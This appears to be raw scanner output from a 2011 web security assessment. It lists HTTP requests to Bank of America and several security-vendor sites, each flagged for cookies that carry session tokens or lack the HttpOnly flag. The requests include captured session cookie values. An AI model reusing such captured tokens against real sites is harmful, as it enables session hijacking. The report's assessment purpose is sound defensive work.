GET / HTTP/1.1 Host: support.sentrigo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.1.10.1303780499
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /trackalyze.asp?r=None&p=http%3A//www.saintcorporation.com/products/saas/webSaintPro.html%3Fgclid%3DCKeR3cTsuKgCFUNd5Qod6WW7Cw&i=12097 HTTP/1.1 Host: t2.trackalyzer.com Proxy-Connection: keep-alive Referer: http://www.saintcorporation.com/products/saas/webSaintPro.html?gclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trackalyzer=241848410610538; loop=http%3A%2F%2Fwww%2Ecriticalwatch%2Ecom%2Fcompany%2Fcritical%2Dwatch%2Dsecurity%2Easpx
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /trackalyze.asp?r=None&p=http%3A//www.abaca.com/&i=11495 HTTP/1.1 Host: t2.trackalyzer.com Proxy-Connection: keep-alive Referer: http://www.abaca.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trackalyzer=241848410610538
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.afreshbunch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookies were issued by the application and do not have the HttpOnly flag set:
CFID=40337214;path=/
CFTOKEN=65706353;path=/
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /interior.cfm?itemCategory=39808&siteid=418&priorId=0 HTTP/1.1 Host: www.backbonesecurity.com Proxy-Connection: keep-alive Referer: http://www.onestoppciscan.com/contact.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 25 Apr 2011 23:43:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=40337214;path=/ Set-Cookie: CFTOKEN=65706353;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <script type="text/javascript" src="http://beta.asoundst ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Control.do?body=where_passcode_popup HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="EN"> <head> <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css" rel="styles ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/cds-iras.go?request_locale=en_US HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/checking-accounts.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/savings-accounts.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/special-programs/add-it-up.go?request_locale=en_US HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/special-programs/keep-the-change.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hub/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /planning/investments.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/Control.do?body=privacysecur_unauthorised_acc_use HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/Search.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap/index.action HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; 